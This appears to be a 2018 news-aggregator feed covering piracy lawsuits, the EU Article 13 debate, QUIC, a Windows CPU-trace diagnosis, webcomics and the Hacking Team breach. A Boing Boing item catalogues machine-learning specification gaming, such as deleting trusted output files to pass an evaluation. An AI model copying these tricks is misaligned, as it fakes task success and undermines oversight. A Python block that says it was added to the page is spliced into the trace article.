DISH and NagraStar alleged that “for only $20 per month”, SET TV gave users access to more than 500 live channels, including on-demand content and PPV broadcasts. The company also sold pre-configured hardware devices that came pre-loaded with the SET TV application. As a result, the plaintiffs demanded a permanent injunction plus huge damages.

In an agreed judgment handed down by a Florida court (the merits of the case were not considered), the demands of DISH and NagraStar have now been met.

“DISH is awarded statutory damages of $90,199,000 under the FCA. The statutory damages are calculated at the parties’ agreed upon $500 for each of the 180,398 subscribers that were acquired directly by Defendants and provided with unauthorized access to DISH’s television programming using Defendants’ SetTV streaming service. Defendants are jointly and severally liable for all damages awarded herein,” the judgment reads.

The defendants in the case (and anyone acting in concert with them) are also permanently enjoined from “receiving, retransmitting, or copying, or assisting others in receiving, retransmitting, or copying, any of DISH’s satellite or over-the-top Internet transmissions of television programming or any content contained therein without authorization”, and having any dealings with infringing subscriptions, set-top devices, or applications.

DISH also won the right to take ownership of all SETTV-branded set-top boxes, similar devices sold through resellers and affiliates, plus subscription codes, passwords and applications relating to the SETTV service.

Additionally, SETTV is required to hand over any domains relating to its service, including but not limited to SETTVNOW.com and SETBROADCAST.com.

“The judgment and injunction against the SetTV service marks a significant victory in the ongoing fight against pay-TV piracy, and a win for consumers who subscribe to legitimate pay-TV services,” DISH said in a statement.

“Following extensive discovery, DISH and the SetTV Defendants reached a confidential settlement agreement. Pursuant to that agreement, the Parties filed stipulated facts and admissions of liability by the SetTV Defendants, along with an agreed judgment and permanent injunction that was entered by the Court on October 24, 2018.

“In compliance with the Court’s injunction, the SetTV service has been shut down permanently and the websites used to operate the service, along with all remaining inventory of receivers and subscription codes, will be forfeited for destruction.”

In common with similarly large damages rulings, it’s unlikely that SETTV will pay anything like the amount cited by the Court. However, the $90m judgment makes great headlines and is likely to act as a deterrent to all but the most aggressive US-based pirates.

The original complaint and subsequent judgment can be found here and here (pdf)

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

09:56

Feeds | 9th ConfOA: the Brazil-Portugal Conference on Open Access [Planet GridPP]

s.aragon, 13 November 2018 - 9:08am

By Raniere Silva, Software Sustainability Institute, Stephan Druskat, Humboldt-Universität zu Berlin. ConfOA is the Brazil-Portugal Conference about Open Access and the 9th edition was hosted in Lisbon, Portugal between the 2nd and 4th October 2018. Although the conference only has open access in its name, it is the place to talk about the broader concept of open science with many stakeholders.

08:14

AIDS, HIV and PrEP by Silver [Oh Joy Sex Toy]

Erika and I have been wanting to do an HIV, AIDS, PrEP comic for yearrrrrs, but always felt like we needed an expert closer to the subject. Fortunately, Silver is here today to share with us his fantastic comic that does a great job of breaking it all down, far better than we could have. This was a huge project and I think it turned out just amazing.

Check out the links below for more info, but keep in mind there are different rules with regards to the recommended use of PrEP in the US, as compared with the rest of the world. We also did a comic about getting an STI test here!

Go drop Silver some silver! Or at the very least, some nice comments:

Further Reading


What is PrEP?/¿Qué es PrEP? (Short video!)
The Real Deal On HIV, PrEP, and PEP via Scarleteen
The STI Files: Human Immunodeficiency Virus (HIV) via Scarleteen
Positively Informed: An HIV/AIDS Roundup via Scarleteen
PrEP and HIV via Planned Parenthood
hiv.gov

07:28

The Targaryens [LFG Comics]

I grew up with cats. I know cats, I freaking love cats. To me, they’ll always be the perfect pet (until the apocalypse, at which point I plan on training some type of rhino). Unfortunately, my wife is rather allergic […]

The post The Targaryens appeared first on Looking For Group.

1242 [LFG Comics]

The post 1242 appeared first on Looking For Group.

For Your Tabletop RPGs! [LFG Comics]

Let me tell you a story. In the very back of our office, past my office, right through the bullpen, the conference room, the kitchen, the break room, the sales, and IT dept, is a door. If you open that […]

The post For Your Tabletop RPGs! appeared first on Looking For Group.

Hardly Working [LFG Comics]

I have to tell you, this thing where I get to be in the office and not worry about working ahead for my next trip is quite enjoyable. To add to that joy, 66% of my kids now remember who […]

The post Hardly Working appeared first on Looking For Group.

What’s To Watch [LFG Comics]

 I haven’t done one of these in a while, but considering I’m having issues writing the last verse to this song and I’m looking for a way to procrastinate while still appearing to be working; Here’s what I’m currently watching- […]

The post What’s To Watch appeared first on Looking For Group.

05:56

Pretweets [Diesel Sweeties webcomic by rstevens]

Tonight's comic wants to go back in time to before social media. Please like and subscribe.

04:28

Link [Scripting News]

William Gibson: "Very little 20th Century sf anticipated anything even remotely like what we must now recognize as the greatest single unanticipated effect of human technology."

02:56

02:00

The next version of HTTP won't be using TCP [OSNews]

The next version of HTTP, as agreed upon by the Internet Engineering Taskforce, is going to make some big changes.

In its continued efforts to make Web networking faster, Google has been working on an experimental network protocol named QUIC: "Quick UDP Internet Connections." QUIC abandons TCP, instead using its sibling protocol UDP (User Datagram Protocol). UDP is the "opposite" of TCP; it's unreliable (data that is sent from one end may never be received by the other end, and the other end has no way of knowing that something has gone missing), and it is unordered (data sent later can overtake data sent earlier, arriving jumbled up). UDP is, however, very simple, and new protocols are often built on top of UDP. QUIC reinstates the reliability and ordering that TCP has but without introducing the same number of round trips and latency. For example, if a client is reconnecting to a server, the client can send important encryption data with the very first packet, enabling the server to resurrect the old connection, using the same encryption as previously negotiated, without requiring any additional round trips.

I am ashamed to admit that I actually know remarkably little of how the core technologies underpinning the internet and the world wide web actually work. It's apparently so well-designed and suited for its task that few of us ever really have to stop and think about how it all works - but when you do, it kind of feels like magic how all of our computers, smartphones, and other connected devices just talk to each other and every little packet of data gets sent to exactly the right place.

00:28

Why Intel processors draw more power than expected [OSNews]

One of the recent topics permeating through the custom PC space recently has been about power draw. Intel's latest eight-core processors are still rated at a TDP of 95W, and yet users are seeing power consumption north of 150-180W, which doesn't make much sense. In this guide, we want to give you a proper understanding why this is the case, and why it gives us reviewers such a headache.

A detailed look at this nebulous topic by AnandTech.

Improving DuckDuckGo [OSNews]

At DuckDuckGo, we do not collect or share any personal information. That's our privacy policy in a nutshell. For example, we do not store IP addresses, and we do not create unique cookies. As such, we do not even have the ability to create search histories or search sessions for any individual - privacy by design. At the same time, we need a way to reliably improve our products for our users in an anonymous way. There are a few methods we've developed to achieve this.

Spoiler alert: it doesn't involve collecting user data.

Monday, 12 November

23:14

[$] C library system-call wrappers, or the lack thereof [LWN.net]

User-space developers may be accustomed to thinking of system calls as direct calls into the kernel. Indeed, the first edition of The C Programming Language described read() and write() as "a direct entry into the operating system". In truth, user-level "system calls" are just functions in the C library like any other. But what happens when the developers of the C library refuse to provide access to system calls they don't like? The result is an ongoing conflict that has recently flared up again; it shows some of the difficulties that can arise when the system as a whole has no ultimate designer and the developers are not talking to each other.

22:56

iSH: an iOS Linux shell for your iPhone or iPad [OSNews]

Have you ever wanted to run a Linux shell on your iOS device to transfer files, write shell scripts, or simply to use Vi to develop code or edit files? Now you can, with a project called iSH that is currently available as a TestFlight beta for iOS devices. iSH is a project that aims to bring a Linux shell to iOS devices using a usermode x86 emulator. iSH is built on the Alpine Linux distro, which is designed to have a small footprint, be secure, and easy to use with little or no distracting bells and whistles.

Neat and useful project. Let's hope it eventually gets approved for App Store distribution.

21:42

View From a Hotel Window, 11/12/18: San Diego [Whatever]

And the weather is perfect, because it’s San Diego and why wouldn’t it be.

Tonight: Come see me and Cixin Liu at the Clarke Center for Human Imagination as we talk about our work, worldbuilding, and all manner of things science fictional! Here are the details. We’d love to see you there!

21:21

Nintendo ‘Wins’ $12 Million From Pirate ROM Site Operators [TorrentFreak]

This summer, Nintendo made it totally clear that websites offering access to its retro-games and ROMs will not be tolerated.

The Japanese game developer filed a complaint at a federal court in Arizona, accusing LoveROMS.com and LoveRETRO.co of massive copyright and trademark infringement.

Faced with millions of dollars in potential damages, the operator of the sites, Jacob Mathias, swiftly took the platforms offline. The legal action also led to the shutdown of several other ROM sites, who feared they could be next.

It quickly became clear that Mathias and his wife, who was later added to the complaint, were not looking forward to a drawn-out legal battle. Instead, they engaged in settlement discussions with Nintendo, hoping to resolve the matter without too much bloodshed.

Today we can report that both sides have indeed reached a deal. They agreed to a consent judgment and a permanent injunction that will resolve all outstanding disputes.

Paperwork obtained by TorrentFreak shows that Mathias and his wife admit that their involvement with the websites constituted direct and indirect copyright and trademark infringement, which caused Nintendo irreparable injury.

However, on paper, the married couple won’t be getting off cheaply. On the contrary, they actually agreed to a judgment that exceeds $12 million.

“Plaintiff is hereby awarded judgment against all Defendants, jointly and severally, in the amount of $12,230,000,” the proposed language reads.

Unsigned final judgment

It seems unlikely that the couple has this kind of money in the bank, or that a jury would have reached a similar figure. So why the high amount?

We can only speculate but it’s possible that Nintendo negotiated such a high number, on paper, to act as a deterrent for other site operators. In practice, the defendants could end up paying much less.

It wouldn’t be the first time that a judgment in court is more than what the parties agreed to privately. This happened before in the MPAA’s lawsuit against Hotfile, where an $80 million judgment in court translated to a $4 million behind-the-scenes settlement.

In addition to the monetary judgment, both parties also agreed on a permanent injunction. This will prevent the couple from infringing Nintendo’s copyrights going forward.

They further have to hand over all Nintendo games and emulators they have, at their own expense. On top of that, the permanent injunction requires them to sign over LoveROMs.com and LoveRETRO.co to the Japanese company.

The documents have yet to be signed off by a judge but considering that both parties agree with it, that should be a formality. After that, it’s game over.

Here are copies of the yet-to-be-signed permanent injunction (pdf) and final judgment (pdf).


20:49

The Humble Book Bundle: Do-It-Yourself by Make:! Don’t let... [Humble Bundle Blog]



The Humble Book Bundle: Do-It-Yourself by Make:! 

Don’t let your dreams be dreams. Just DO IT with this book bundle from Maker Media! Get titles like Make: Musical Inventions, Make: Tips and Tales from the Workshop, and Make: Fun!. Plus, your purchase will support Maker Education!


Link [Scripting News]

I've been making a lot of phone calls lately on my iPhone (6, iOS 12.1), and the volume on the calls is way too low. I have to force the phone to my ear and it still needs to be louder. I've turned the volume on the phone all the way up. What can I do? (Update: Here's a list of things I tried. I think the volume went up. I'll find out for sure on my next phone conversation.)

19:56

The Never Now [Scenes From A Multiverse]

I wanted to do a comic about comics control but it’s too soon to talk about comics. Not after comics killed all those students.

It’s not too soon to be ordering your holiday gifts from our store, though! Get it done now and you can spend the next two months blissfully drunk.

New Guest Blogger: Heather Child [Charlie's Diary]

Hello everyone, and apologies for the lack of activity here lately!

I'd like to introduce you to our new guest blogger, Heather Child. Heather is a Bristol, UK based author who has worked in non-profit marketing for the last twelve years, coming into close contact with the digital automation and personalisation technologies that herald the 'big data' age. Everything About You is her debut novel, published by Orbit Books (US edition here); her second novel, The Undoing of Arlo Knott, is due in July 2019. You can find out more at www.heather-child.co.uk. And I'm very pleased to say that she'll be posting here later this week.

19:28

A catalog of ingenious cheats developed by machine-learning systems [Cory Doctorow – Boing Boing]

When you train a machine learning system, you give it a bunch of data -- a simulation, a dataset, etc -- and it uses statistical methods to find a way to solve some task: land a virtual airplane, recognize a face, match a block of text with a known author, etc.

Like the mischievous genies of legend, machine learning systems will sometimes solve your problems without actually solving them, exploiting loopholes in the parameters you set to find shortcuts to the outcome you desired: for example, if you try to train a machine learning system to distinguish poisonous and non-poisonous mushrooms by alternating pictures of each, it might learn that all odd-numbered data-points represent poisonous mushrooms, and ignore everything else about the training data.

Victoria Krakovna's Specification gaming examples in AI is a project to identify these cheats. It's an incredibly fun-to-read document, a deep and weird list of all the ways that computers find loopholes in our thinking. Some of them are so crazy-clever that it's almost impossible not to impute perverse motives to the systems involved.

* A robotic arm trained to slide a block to a target position on a table achieves the goal by moving the table itself.

* Game-playing agent accrues points by falsely inserting its name as the author of high-value items

* Creatures exploited physics simulation bugs by twitching, which accumulated simulator errors and allowed them to travel at unrealistic speeds

* In an artificial life simulation where survival required energy but giving birth had no energy cost, one species evolved a sedentary lifestyle that consisted mostly of mating in order to produce new children which could be eaten (or used as mates to produce more edible children).

* Genetic algorithm is supposed to configure a circuit into an oscillator, but instead makes a radio to pick up signals from neighboring computers

* Genetic debugging algorithm GenProg, evaluated by comparing the program's output to target output stored in text files, learns to delete the target output files and get the program to output nothing. Evaluation metric: “compare youroutput.txt to trustedoutput.txt”. Solution: “delete trusted-output.txt, output nothing”

* AI trained to classify skin lesions as potentially cancerous learns that lesions photographed next to a ruler are more likely to be malignant.

* Genetic algorithms for image classification evolves timing attack to infer image labels based on hard drive storage location

Specification gaming examples in AI [Victoria Krakovna/Google Spreadsheets]

(via Kottke)

19:14

Page 51 [Flipside]

Page 51 is done.

News Post: No Thank U [Penny Arcade]

Tycho: Gwob was talking about Adventure Mode before, and how savory it is, and how it’s mostly new to us because a substantial amount of our Diablo 3 play was back when it still had a cash store.  I have a real challenge with games of the “loot-‘em-up” variety, and it’s whenever I get to “the desert level.”  It has an almost total ability to sunder my momentum, even for a game I’m nuts about.  Whenever they make me start trudgin’ through some kinda Goddamn dunes or some shit I’m audi.  I’m not proud of it or…

17:42

Comic: No Thank U [Penny Arcade]

New Comic: No Thank U

Link [Scripting News]

Earlier today I wrote a tweet that started getting a lot of flow. Then I thought this is possibly something Jay Rosen could endorse. So I sent an email, he RTd and then the flow went up quite a bit more. I noted, again via email: "If your influence keeps growing, you could probably solve some of journalism's problems just with your flow." I was thinking of picking out voices that weren't being heard in the journalism-centered conversations but if they were, might adjust how it covers the changed world as we find it today. 💥

17:21

Today in GPF History for Monday, November 12, 2018 [General Protection Fault: The Comic Strip]

Trish is overwhelmed as Ki tries to catch her up on all that's happened to her...

16:28

Security updates for Monday [LWN.net]

Security updates have been issued by Arch Linux (curl, lib32-curl, lib32-libcurl-compat, lib32-libcurl-gnutls, libcurl-compat, libcurl-gnutls, systemd, and thunderbird), Debian (ansible, ghostscript, qemu, thunderbird, and xen), Fedora (community-mysql, gettext, links, mysql-connector-java, xen, and zchunk), Gentoo (icecast, libde265, okular, pango, and PHProjekt), Mageia (ansible, audiofile, iniparser, libtiff, mercurial, opencc, and python-dulwich), openSUSE (accountsservice, apache2, audiofile, curl, libarchive, ntfs-3g_ntfsprogs, opensc, python, python-base, qemu, soundtouch, and systemd), Oracle (git, java-1.7.0-openjdk, java-11-openjdk, kernel, python-paramiko, thunderbird, and xorg-x11-server), Red Hat (rh-git29-git), Scientific Linux (thunderbird), SUSE (kernel), and Ubuntu (gettext and libmspack).

Youtube CEO: it will be impossible to comply with the EU's new Copyright Directive (adios, Despacito!) [Cory Doctorow – Boing Boing]

Under Article 13 of the new EU Copyright Directive, it will no longer be enough for online platforms to remove materials if someone claims they infringe copyright; instead, the platforms will have to prevent the display of any copyrighted material that has not been explicitly licensed for distribution.

In a new blog post, Youtube CEO Susan Wojcicki continues her series of posts about the impossibility of complying with this rule.

Wojcicki considers the example of Youtube's all-time most popular video, Despacito, which has been cleared for Youtube by its creator, but whose "multiple copyrights" include some works whose proprietors are unknown or disputed. Under Article 13, Youtube would be expected to censor this video and deny the creators involved the opportunity to earn the small fortune in ad revenue that Youtube has paid them, as well as access to the 5.6 billion (!) viewings the video has received.

The consequences of article 13 go beyond financial losses. EU residents are at risk of being cut off from videos that, in just the last month, they viewed more than 90bn times. Those videos come from around the world, including more than 35m EU channels, and they include language classes and science tutorials as well as music videos. We welcome the chance to work with policymakers and the industry to develop a solution within article 13 that protects rights holders while also allowing the creative economy to thrive. This could include more comprehensive licensing agreements, collaboration with rights holders to identify who owns what, and smart rights management technology, similar to Content ID.

The Potential Unintended Consequences of Article 13 [Susan Wojcicki/Youtube Blog]

15:56

The case of the System process that consumed a lot of CPU [The Old New Thing]

A report came in through Feedback Hub that the System process was consuming high CPU. I was able to explain to the customer how to include a performance trace so the problem could be diagnosed.

In case you want to file a performance issue, the way to include a performance trace is to go to the Additional details section and click the Recreate my problem button. You will get additional options:

To help us understand what is causing the problem, please try to make it happen again while we follow along and capture data.
Include data about Performance
Include screenshots of each step
You will be able to review and edit the data before sending it.
⏱ Start capture

Check the Include data about box and select Performance as the category. Assuming the performance problem is ongoing, click Start capture and let it run for about 15 seconds, then click Stop capture. (If the performance problem occurs only when you perform a certain activity, then click Start capture, then do the activity that creates the performance issue, and then click Stop capture.)

That creates a performance trace that will be attached to your report.

Okay, let's open the performance trace that this customer included. The tool for this is the Windows Performance Analyzer.

Since the problem is high CPU, the natural place to start is the Computation graph, which shows CPU usage.

[Graph: Computation (CPU usage)]

Yup, that sure looks like high CPU usage there.

Create an analysis page for that graph and zoom in to the period of high CPU. Here's what's using the CPU:

Line # Process Thread ID Stack Count % Weight
1 ▷ System 29,815 65.15
2 Idle 0 ▷ [Idle] 510 21.35
3 ▷ Taskmgr.exe (14412) 0.25
4 ▷ MsMpEng.exe (5180) 0.07

And indeed most of it is going to the System process with 65.15%. The Idle thread is a distant second with 21.35%, and everybody else is noise.

So let's dig into the System process.

Line # Process Thread ID Stack Count % Weight
1 ▼System (4) 29,815 65.15
2 9200 ▷[Root] 1,605 3.51
3 19708 ▷[Root] 1,576 3.44
4 ▷18748 1,361 2.97
5 17480 ▷[Root] 1,346 2.93
6 12132 ▷[Root] 1,341 2.93
7 13020 ▷[Root] 1,220 2.67
8 15064 ▷[Root] 1,181 2.58
9 16364 ▷[Root] 1,084 2.36
10 11376 ▷[Root] 1,058 2.31
11 20444 ▷[Root] 994 2.17
12 21000 ▷[Root] 978 2.14
13 20648 ▷[Root] 905 1.97
14 ▷19076 895 1.95
15 8572 ▷[Root] 757 1.65
16 13864 ▷[Root] 743 1.62
17 17072 ▷[Root] 685 1.50
18 16224 ▷[Root] 653 1.43
19 ▷15988 625 1.37
20 19592 ▷[Root] 604 1.32
21 1784 ▷[Root] 571 1.25
22 17872 ▷[Root] 560 1.22
⋮ ⋮ ⋮ ⋮ ⋮

Hm, everything just flattens out. There's no big culprit sucking up all the CPU.

Are we being nibbled to death?

Let's look at two of those threads, maybe we'll discover something.

Line # Process Thread ID Stack Count % Weight
1 ▼System (4) 29,815 65.15
2 9200 [Root] 1,605 3.51
3 ntoskrnl.exe!KxStartSystemThread 1,605 3.51
4 |    ntoskrnl.exe!PspSystemThreadStartup 1,605 3.51
5 |    ntoskrnl.exe!ExpWorkerThread 1,605 3.51
6 |- ntoskrnl.exe!IopProcessWorkItem 1,554 3.40
7 |- ntoskrnl.exe!KeRemovePriQueue 50 0.11
8 |- ntoskrnl.exe!ExpWorkerThread<itself> 1 0.00
9 19708 [Root] 1,576 3.44
10 |- ntoskrnl.exe!KxStartSystemThread 1,574 3.44
11 |    ntoskrnl.exe!PspSystemThreadStartup 1,574 3.44
12 |    ntoskrnl.exe!ExpWorkerThread 1,574 3.44
13 |    |- ntoskrnl.exe!IopProcessWorkItem 1,538 3.36
14 |    |- ntoskrnl.exe!KeRemovePriQueue 36 0.08

Okay, it seems that the threads are doing IopProcessWorkItem. That explains why the work is so evenly spread out: It's a thread pool.

Remove the Thread ID column because we don't care about which thread is doing the work. Now we can group purely by stacks.

Line # Process Stack Count % Weight
1 System (4) 29,815 65.14
2 [Root] 29,810 65.13
3 |- ntoskrnl.exe!KxStartSystemThread 29,794 65.09
4 |    ntoskrnl.exe!PspSystemThreadStartup 29,794 65.09
5 |    ntoskrnl.exe!ExpWorkerThread 29,699 64.89
6 |    |- ntoskrnl.exe!IopProcessWorkItem 28,742 62.81
7 |    |- contoso.sys!<PDB not found> 28,707 62.74
8 |    |    |- contoso.sys!<PDB not found> 28,699 62.72
9 |    |    |    |- contoso.sys!<PDB not found> 28,588 62.48
10 |    |    |    |    |- ntoskrnl.exe!RtlWriteRegistryValue 28,572 62.44

Aha, basically all of the work items are going to the Contoso driver, and that driver does very little work of its own. Of the 28,707 samples that showed that we were running a Contoso work item, 28,572 of them (over 99%) were in RtlWriteRegistryValue.

Basically, the Contoso driver was burning up all your CPU writing furiously to the registry.

The developers at Contoso replied that the customer was running a version of the driver that was over a year old. They suggested the customer upgrade to the latest driver and see if that fixes the problem.

I'm sure that upgrading to the latest driver will make the problem go away, but I'm not convinced that it'll fix the problem. Because what's probably happening is that the driver got into some sort of error state and is writing diagnostic information to the registry. That'll go away even if you don't upgrade the driver. All you have to do is reboot.

The real question is what sort of error state the driver managed to get itself into.
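The regrouping step in this post (drop the Thread ID column, then fold by stack), as an added Python example that is not from the original post. The frame names come from the trace shown above; the sample counts, the thread IDs and the fabrikam.sys module are constructed.

```python
from collections import Counter

# Frame names are taken from the trace in the post. The sample counts, the
# thread IDs and fabrikam.sys are constructed for illustration.
WORKER = ("ntoskrnl.exe!KxStartSystemThread",
          "ntoskrnl.exe!PspSystemThreadStartup",
          "ntoskrnl.exe!ExpWorkerThread")
HOT = WORKER + ("ntoskrnl.exe!IopProcessWorkItem",
                "contoso.sys!<PDB not found>",
                "ntoskrnl.exe!RtlWriteRegistryValue")
WAIT = WORKER + ("ntoskrnl.exe!KeRemovePriQueue",)
OTHER = WORKER + ("ntoskrnl.exe!IopProcessWorkItem",
                  "fabrikam.sys!<PDB not found>")


def build_samples(threads=20, hot=47, wait=2, other=1):
    """Constructed CPU samples: (thread_id, stack), stacks are root-first."""
    samples = []
    for i in range(threads):
        tid = 9000 + 4 * i
        samples += [(tid, HOT)] * hot + [(tid, WAIT)] * wait
        samples += [(tid, OTHER)] * other
    return samples


def weight_by_thread(samples):
    """View 1: group by thread ID. Returns {thread_id: share of samples}."""
    counts = Counter(tid for tid, _ in samples)
    total = sum(counts.values())
    return {tid: n / total for tid, n in counts.items()}


def inclusive_by_prefix(samples):
    """View 2: ignore the thread ID and fold stacks into inclusive counts.

    Every prefix of a root-first stack is credited with the sample, which
    is what the Count column of a stack-grouped view reports.
    """
    counts = Counter()
    for _, stack in samples:
        for depth in range(1, len(stack) + 1):
            counts[stack[:depth]] += 1
    return counts


def hottest_path(samples, min_share=0.5):
    """Follow the heaviest child from the root while it still holds at
    least min_share of all samples. Returns [(frame, share), ...]."""
    counts = inclusive_by_prefix(samples)
    total = len(samples)
    path, prefix = [], ()
    while True:
        children = {p: n for p, n in counts.items()
                    if len(p) == len(prefix) + 1 and p[:len(prefix)] == prefix}
        if not children:
            break
        best = max(children, key=children.get)
        if children[best] / total < min_share:
            break
        path.append((best[-1], children[best] / total))
        prefix = best
    return path


def module_weights(samples):
    """Per module: samples with the module anywhere on the stack
    (inclusive) and samples where it is the leaf frame (exclusive)."""
    inclusive, exclusive = Counter(), Counter()
    for _, stack in samples:
        modules = [frame.split("!", 1)[0] for frame in stack]
        inclusive.update(set(modules))
        exclusive[modules[-1]] += 1
    return inclusive, exclusive


if __name__ == "__main__":
    samples = build_samples()
    busiest = max(weight_by_thread(samples).values())
    print("busiest single thread: %.1f%%" % (100 * busiest))
    for frame, share in hottest_path(samples):
        print("%5.1f%%  %s" % (100 * share, frame))
    inc, exc = module_weights(samples)
    for module in inc:
        print("%-14s inclusive=%4d exclusive=%4d"
              % (module, inc[module], exc[module]))
```

A module with a large inclusive count and an exclusive count near zero is the pattern described above: the driver is on almost every hot stack but the CPU time is spent in the kernel routine it calls.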

15:07

YouTube CEO Says That Videos May Be Blocked Due to EU Copyright Law [TorrentFreak]

Two years ago the European Commission announced plans to modernize EU copyright law.

Some of the proposals were hugely controversial. Article 13, for example, would see the liability for infringing content switched from users of sites like YouTube to the platform itself.

But, despite warnings, in September the European Parliament voted in favor of proposals put forward by Axel Voss’ EPP group.

This is a revised version of the original proposal, but one that would still pave the way for upload filters, to prevent infringing content from reaching sites like YouTube in the first place. However, speaking today in Financial Times (paywall), YouTube CEO Susan Wojcicki says that blocking videos may be the platform’s only option.

“While we support the goals of article 13, the European Parliament’s current proposal will create unintended consequences that will have a profound impact on the livelihoods of hundreds of thousands of people,” Wojcicki writes.

“The parliament’s approach is unrealistic in many cases because copyright owners often disagree over who owns what rights. If the owners cannot agree, it is impossible to expect the open platforms that host this content to make the correct rights decisions.”

Using the hit “Despacito” as an example, Wojcicki says that the track contains multiple copyrights including sound recording and publishing rights. YouTube has agreements with several parties to license the video but other rightsholders remain unknown. This could present a situation so complex that YouTube might have to stop hosting the video altogether.

“That uncertainty means we might have to block videos like this to avoid liability under article 13. Multiply that risk with the scale of YouTube, where more than 400 hours of video are uploaded every minute, and the potential liabilities could be so large that no company could take on such a financial risk,” she adds.

While the rest of the world appears to be safe from such blocking, YouTube’s CEO warns that it is EU residents that will be affected. During the last month alone, videos were viewed by citizens more than 90 billion times.

Wojcicki says her company wants to work with policymakers and the industry to develop Article 13 in a way that protects rightsholders but without stifling the creative economy. That might include broader licensing agreements, improved collaboration with rightsholders, and technical solutions, similar to Content ID.

“Platforms that follow these rules, and make a good effort to help rights holders identify their content, shouldn’t be held directly liable for every single piece of content that a user uploads,” Wojcicki writes.

“We ask policymakers to find a solution that protects rights holders and creators alike, and listen to the growing number of EU voices, including some member countries, who agree there’s a better way forward.”

In a report last week detailing how Google fights piracy, the company noted that between October 2017 and September 2018, YouTube had paid more than $1.8 billion to the music industry from advertising revenue alone.

Last Friday, however, that figure was challenged by IFPI Chief Executive, Frances Moore.

“We welcome Google’s recognition that it and Google’s YouTube need to operate responsibly and properly value creators and their work. However, the figures in Google’s anti-piracy paper don’t match our own,” Moore said.

“It is difficult to get any clarity on Google’s claims as it doesn’t explain its methodology, but IFPI data shows that revenue returning to the record industry through video streaming services (including but not limited to YouTube) with 1.3 billion users amounted to US $856 million in 2017 – less than half of Google’s claim and less than US $1 per user per year.”

It seems clear that YouTube and the music industry are yet to see eye to eye on this problem but with the platform suggesting that blocking might be the only option, as we envisioned earlier, the pressure is increasing on supporters of Article 13 to avoid this worst-case scenario.


Mike Gabriel: Results produced while at "X2Go - The Gathering 2018" in Stuttgart [Planet Debian]

Over the last weekend, I have attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accommodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone, that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite ok to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk, interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)

  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.

2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)

  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: Prepare nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group. Together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add check directly after authentication that exits with error, if the remote server has the X2Go Server software installed. Bail out, if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.

2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)

  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started


14:56

Italian prosecutors have given up on catching the person who hacked and destroyed Hacking Team [Cory Doctorow – Boing Boing]

Hacking Team (previously) was an Italian company that developed cyberweapons that it sold to oppressive governments around the world, to be used against their own citizens to monitor and suppress political oppositions; in 2015, a hacker calling themselves "Phineas Fisher" hacked and dumped hundreds of gigabytes' worth of internal Hacking Team data, effectively killing the company.

Three years later, the Italian prosecutors who have been chasing Phineas Fisher have given up on unmasking them. On Motherboard, Lorenzo Franceschi-Bicchierai combines the contents of sealed court documents with an interview with "Fisher" to reveal the tradecraft that kept Fisher safe from legal retaliation; the stupid mistakes that left Hacking Team vulnerable; and the sleazy tactics the company's CEO used to torment his former employees in the name of tracking down Fisher.

Fisher's ability to evade unmasking is largely attributable to their extreme caution and diligence: using tools like Tor to remain anonymous, and using stolen, hacked Bitcoin to buy the services and tools that Fisher used to penetrate Hacking Team's defenses.

The attack was only possible because David Vincenzetti, Hacking Team's founder and CEO, refused to upgrade his VPN software, forcing the IT workers at Hacking Team to keep older, legacy services running. One of the systems administrators who might have caught Fisher during their raids on Hacking Team's data was reportedly distracted by a weeks-long World of Warcraft binge, allowing Fisher to operate with impunity.

